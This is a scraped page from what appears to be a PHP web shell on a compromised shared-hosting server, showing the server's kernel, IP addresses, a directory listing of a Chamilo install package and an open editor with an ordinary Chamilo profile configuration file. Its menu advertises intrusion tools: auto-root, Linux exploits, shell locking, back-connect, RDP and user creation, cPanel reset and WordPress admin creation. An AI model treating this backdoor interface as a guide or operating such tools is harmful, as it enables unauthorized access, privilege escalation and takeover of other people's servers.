Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.12.154.133
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
chamilo /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
add_course.conf.php
265
B
-rw-r--r--
auth.conf.php
6.37
KB
-rw-r--r--
chamilo.sql
284.14
KB
-rw-r--r--
chamilo.zip
121.72
MB
-rw-r--r--
clone.php
5.82
KB
-rw-r--r--
configuration.php
131.29
KB
-rw-r--r--
course_info.conf.php
176
B
-rw-r--r--
edit.php
4.26
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
events.conf.php
3.23
KB
-rw-r--r--
fileindex.php
516
B
-rw-r--r--
import.php
3.45
KB
-rw-r--r--
info.xml
3.25
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
6.63
KB
-rw-r--r--
install.xml
4.24
KB
-rw-r--r--
mail.conf.php
3.42
KB
-rw-r--r--
md5
1.47
KB
-rw-r--r--
notes.txt
1.22
KB
-rw-r--r--
profile.conf.php
1.31
KB
-rw-r--r--
upgrade.php
5.86
KB
-rw-r--r--
upgrade.xml
419
B
-rw-r--r--
vendor.zip
179.41
MB
-rw-r--r--
web.zip
59.45
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile.conf.php
<?php /** * This file holds the configuration constants and variables * for the user profile tool. * * @package chamilo.configuration */ // Autentication, password define('CHECK_PASS_EASY_TO_FIND', true); $profileIsEditable = true; // User photos define('PREFIX_IMAGE_FILENAME_WITH_UID', true); // If true, filename of images on server begin with uid of the user. define('RESIZE_IMAGE_TO_THIS_HEIGTH', 180); define('IMAGE_THUMBNAIL_WIDTH', 100); // Replacing user photos define('KEEP_THE_NAME_WHEN_CHANGE_IMAGE', true); // true -> the new image have the name of previous. // false -> a new name is build for each upladed image. define('KEEP_THE_OLD_IMAGE_AFTER_CHANGE', true); // true -> if KEEP_THE_NAME_WHEN_CHANGE_IMAGE is true, the previous image is rename before. // false -> only the last image still on server. // Official code // Don't forget to change name of offical code in your organization // See $langOfficialCode within the language file 'registration' define('CONFVAL_ASK_FOR_OFFICIAL_CODE', true); // not used but name fixed define('CONFVAL_CHECK_OFFICIAL_CODE', false); /* if CONFVAL_CHECK_OFFICIAL_CODE is true, build here the function personal_check_official_code($code, $valueToReturnIfOk, $valueToReturnIfBad) { return $stateOfficialCode = true; } */ // For stats define('NB_LINE_OF_EVENTS', 15);
Close